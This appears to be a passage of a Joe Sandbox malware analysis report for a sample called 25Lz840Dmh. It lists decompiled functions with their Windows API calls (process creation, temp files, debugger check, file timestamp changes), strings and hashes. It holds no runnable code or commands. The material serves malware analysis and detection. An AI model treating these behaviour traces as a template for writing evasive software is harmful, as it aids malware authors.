                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 856d6ae5d9a376aa8adeb647b0da2b4ad736417ba7307f101b30c962a8486d6b
                                                  • Instruction ID: 9534d2d641aea2eb407d3f9b006c25aefa4363adb70d1c95fafcc24bf3635a17
                                                  • Opcode Fuzzy Hash: 856d6ae5d9a376aa8adeb647b0da2b4ad736417ba7307f101b30c962a8486d6b
                                                  • Instruction Fuzzy Hash: ED219071A0025C9BDF41DF94D845BEEBBF8AF4A714F00409AE908BB241DFB4598D9FA1
                                                  Function 00C58D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: 55c20aa7c37b120d95f0c3ec78349156fac5c41adbdc0739dc0e8fb42e7e34f9
                                                  • Instruction ID: 60871e97a44351591f5ffb621b1bf86463462f910ab84792c29fe1e658914313
                                                  • Opcode Fuzzy Hash: 55c20aa7c37b120d95f0c3ec78349156fac5c41adbdc0739dc0e8fb42e7e34f9
                                                  • Instruction Fuzzy Hash: 1B01F9719042187EDB18CAA8C816EEEBBF8DB11301F00419AF592D2181E875A6489BA0
                                                  Function 02281000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02281045
                                                  • ExitProcess.KERNEL32(00000000), ref: 02281064
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1301328503.0000000002280000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2280000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateExit
                                                  • String ID: D
                                                  • API String ID: 126409537-2746444292
                                                  • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                  • Instruction ID: a10d8b89f04e39bacf3cb5120f577440f18644e016f6ecc278f31f717e86f553
                                                  • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                  • Instruction Fuzzy Hash: 75F0ECB195125CABDB60EFE0CC49FEE777CBF04701F008908FE0A9A184DA78D6088B61
                                                  Function 00C598E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00C598F8
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C5990F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 9f65e65a531008bd38f62ec89a19a1eee8176d48cef6096eb70965917ba9c5c5
                                                  • Instruction ID: d582fd87f5b73d39a2754c0f20bbb067fff45dd84db2478066e844af5c87d3b3
                                                  • Opcode Fuzzy Hash: 9f65e65a531008bd38f62ec89a19a1eee8176d48cef6096eb70965917ba9c5c5
                                                  • Instruction Fuzzy Hash: 01D05E7954030DABDB509BA0DC4EFAA773CE704704F0002B1BA98920A2EEB099998B91
                                                  Function 00C6CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf08768ed1a5004f7278287a3a4da3006bf777865612645dafb124c25865b7d4
                                                  • Instruction ID: cce7e022a784b0c60e189ed72fdace40017cd939c863073b8bd425be2657e4b3
                                                  • Opcode Fuzzy Hash: cf08768ed1a5004f7278287a3a4da3006bf777865612645dafb124c25865b7d4
                                                  • Instruction Fuzzy Hash: 74F148706083049FCB24DF28C484A6ABBE5FF88314F14896EF9A99B251D731E945CF82
                                                  Function 00BFF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C10193
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C1019B
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C101A6
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C101B1
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C101B9
                                                    • Part of subcall function 00C10162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C101C1
                                                    • Part of subcall function 00C060F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BFF930), ref: 00C06154
                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BFF9CD
                                                  • OleInitialize.OLE32(00000000), ref: 00BFFA4A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C345C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID:
                                                  • API String ID: 1986988660-0
                                                  • Opcode ID: 40a8ceac0f22b1a21b6e089d9f7c729e8ef1665c6ce72eee095c18a8037fd4dc
                                                  • Instruction ID: 8a9362c9d51c19d040d9ac8a2b3d2b114bd2d8ce25822a32d2b57ade34ab2eb0
                                                  • Opcode Fuzzy Hash: 40a8ceac0f22b1a21b6e089d9f7c729e8ef1665c6ce72eee095c18a8037fd4dc
                                                  • Instruction Fuzzy Hash: 6581CBB0A15A408FC795EF39A84576D7BE9FB58306F54866AD018CB3B2EB704489CF14
                                                  Function 00BF434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00BF4370
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BF4415
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF4432
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: 5aa5097a95c519b93d3a09e6c0d53d19c35ebdc310dfbd86cb5fe008be01e0e4
                                                  • Instruction ID: 445e50a48ae0ed4fe2d478a215885d87e8320401d88b780dd8425049489ddd59
                                                  • Opcode Fuzzy Hash: 5aa5097a95c519b93d3a09e6c0d53d19c35ebdc310dfbd86cb5fe008be01e0e4
                                                  • Instruction Fuzzy Hash: 66318FB05057059FC720DF24D8847ABBBF8FB48309F000A6EF69A93251E770A948CB56
                                                  Function 00C1571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00C15733
                                                    • Part of subcall function 00C1A16B: __NMSG_WRITE.LIBCMT ref: 00C1A192
                                                    • Part of subcall function 00C1A16B: __NMSG_WRITE.LIBCMT ref: 00C1A19C
                                                  • __NMSG_WRITE.LIBCMT ref: 00C1573A
                                                    • Part of subcall function 00C1A1C8: GetModuleFileNameW.KERNEL32(00000000,00CB33BA,00000104,?,00000001,00000000), ref: 00C1A25A
                                                    • Part of subcall function 00C1A1C8: ___crtMessageBoxW.LIBCMT ref: 00C1A308
                                                    • Part of subcall function 00C1309F: ___crtCorExitProcess.LIBCMT ref: 00C130A5
                                                    • Part of subcall function 00C1309F: ExitProcess.KERNEL32 ref: 00C130AE
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  • RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00C10DD3,?), ref: 00C1575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 9b2cb7593fd5a363d6d5973e50ce3578287b6dc54eee94c340d7e83fd769543c
                                                  • Instruction ID: 7600d7a132db5934b558f8a7e3bbebcaf583d0ead71260bc80e2db58224cbaa1
                                                  • Opcode Fuzzy Hash: 9b2cb7593fd5a363d6d5973e50ce3578287b6dc54eee94c340d7e83fd769543c
                                                  • Instruction Fuzzy Hash: 6801D235264A41EBD6112735AC83BEE73889BC3361F500529F429DA2D1DEB099C176A1
                                                  Function 00C598A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C59548,?,?,?,?,?,00000004), ref: 00C598BB
                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C59548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C598D1
                                                  • CloseHandle.KERNEL32(00000000,?,00C59548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C598D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleTime
                                                  • String ID:
                                                  • API String ID: 3397143404-0
                                                  • Opcode ID: b2b56a98d428b73fa10e07dca0dc39d1b1f3e6ed67d3376a876eeafe19169981
                                                  • Instruction ID: ed5f1c4d654939589b0c84815aa435a4f82bbb8a67e810228cc68737a62cddaa
                                                  • Opcode Fuzzy Hash: b2b56a98d428b73fa10e07dca0dc39d1b1f3e6ed67d3376a876eeafe19169981
                                                  • Instruction Fuzzy Hash: 10E08632141214F7EB211B64EC4AFDE7B59EB06761F104124FB28690F087B116529798
                                                  Function 00C58D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00C58D1B
                                                    • Part of subcall function 00C12D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C19A24), ref: 00C12D69
                                                    • Part of subcall function 00C12D55: GetLastError.KERNEL32(00000000,?,00C19A24), ref: 00C12D7B
                                                  • _free.LIBCMT ref: 00C58D2C
                                                  • _free.LIBCMT ref: 00C58D3E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                  • Instruction ID: 98217e8d3176639e6d6eb77039f98bb2b8d58c8c991d716a0506dc0d2927efeb
                                                  • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                  • Instruction Fuzzy Hash: 98E0C2A560160282CB20B678F840AD313FC4F48353744080DB81DE7182CE60F8CAE028
                                                  Function 00BFA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
                                                  • Opcode ID: ee4137c279873256d3c4a9bc979f6250dfb288d3ef5eb7686761de1f9bccc3a6
                                                  • Instruction ID: 74c98db8998f18de83fbf636e76e49fa43d61f7aa8a5502005d27caffea9cfce
                                                  • Opcode Fuzzy Hash: ee4137c279873256d3c4a9bc979f6250dfb288d3ef5eb7686761de1f9bccc3a6
                                                  • Instruction Fuzzy Hash: 2D2269B4508209DFC728DF14C490B6AB7E1FF45304F1489ADE99A8B362D771ED89DB82
                                                  Function 00BF4C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: EA06
                                                  • API String ID: 4104443479-3962188686
                                                  • Opcode ID: 900f1b1fa4dd75426282d7606924f69e81baab48fa2a54970e1924cd46ed2e31
                                                  • Instruction ID: 2b91bb7ba11b32af8417744f2666822c2d5eea869a06f51701451d9795d47f40
                                                  • Opcode Fuzzy Hash: 900f1b1fa4dd75426282d7606924f69e81baab48fa2a54970e1924cd46ed2e31
                                                  • Instruction Fuzzy Hash: 46417C35A0415C67DF259B6488917BF7FE6DB46300F2844F4EF869B282D7308E4C83A1
                                                  Function 00BF47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsThemeActive.UXTHEME ref: 00BF4834
                                                    • Part of subcall function 00C1336C: __lock.LIBCMT ref: 00C13372
                                                    • Part of subcall function 00C1336C: DecodePointer.KERNEL32(00000001,?,00BF4849,00C47C74), ref: 00C1337E
                                                    • Part of subcall function 00C1336C: EncodePointer.KERNEL32(?,?,00BF4849,00C47C74), ref: 00C13389
                                                    • Part of subcall function 00BF48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00BF4915
                                                    • Part of subcall function 00BF48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BF492A
                                                    • Part of subcall function 00BF3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BF3B68
                                                    • Part of subcall function 00BF3B3A: IsDebuggerPresent.KERNEL32 ref: 00BF3B7A
                                                    • Part of subcall function 00BF3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CB52F8,00CB52E0,?,?), ref: 00BF3BEB
                                                    • Part of subcall function 00BF3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00BF3C6F
                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00BF4874
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                  • String ID:
                                                  • API String ID: 1438897964-0
                                                  • Opcode ID: e04b2277201a20b91797f58f901ffb31544c783a70c69e8413d3ff1fddd1a58f
                                                  • Instruction ID: 56c8e53312f6916b8c500e0b92445fb40467d3aac56fc261219a3f8363aae84d
                                                  • Opcode Fuzzy Hash: e04b2277201a20b91797f58f901ffb31544c783a70c69e8413d3ff1fddd1a58f
                                                  • Instruction Fuzzy Hash: 79119A719087459FC700EF28E845B1EBBE8EF99790F104A5EF154932B1DBB09A49CF92
                                                  Function 00BF5C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00BF5821,?,?,?,?), ref: 00BF5CC7
                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00BF5821,?,?,?,?), ref: 00C2DD73
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: e3b0a4f2e50b24c31b59389126e6c7e459b2aeef5ac72826192dcd21cd2edfd0
                                                  • Instruction ID: 6c1cc80fe8ce5cfa0fc55561fe910456b58f4f42aa23063e837a2d4a56e91ab9
                                                  • Opcode Fuzzy Hash: e3b0a4f2e50b24c31b59389126e6c7e459b2aeef5ac72826192dcd21cd2edfd0
                                                  • Instruction Fuzzy Hash: 9F018470144748BEF7304E25CC8AF7636DCEB01768F108359FBE69A1E0C6B41C898B50
                                                  Function 00C10DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C1571C: __FF_MSGBANNER.LIBCMT ref: 00C15733
                                                    • Part of subcall function 00C1571C: __NMSG_WRITE.LIBCMT ref: 00C1573A
                                                    • Part of subcall function 00C1571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00C10DD3,?), ref: 00C1575F
                                                  • std::exception::exception.LIBCMT ref: 00C10DEC
                                                  • __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                    • Part of subcall function 00C1859B: RaiseException.KERNEL32(?,?,?,00CA9E78,00000000,?,?,?,?,00C10E06,?,00CA9E78,?,00000001), ref: 00C185F0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 3902256705-0
                                                  • Opcode ID: c7ef491220118365fc9c9621a9f0a4bfe36b6940f9db40b0a32fb5796c39ed62
                                                  • Instruction ID: 66543a2782feae4d9cca58317fee37813c29de93fe6d5c1cbd21a00c08c3cd72
                                                  • Opcode Fuzzy Hash: c7ef491220118365fc9c9621a9f0a4bfe36b6940f9db40b0a32fb5796c39ed62
                                                  • Instruction Fuzzy Hash: A1F0F47180421E66CB10BA94EC069DE7BECDF03314F20042AF81496281DFB0AAC4F2D5
                                                  Function 00C155FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __lock_file_memset
                                                  • String ID:
                                                  • API String ID: 26237723-0
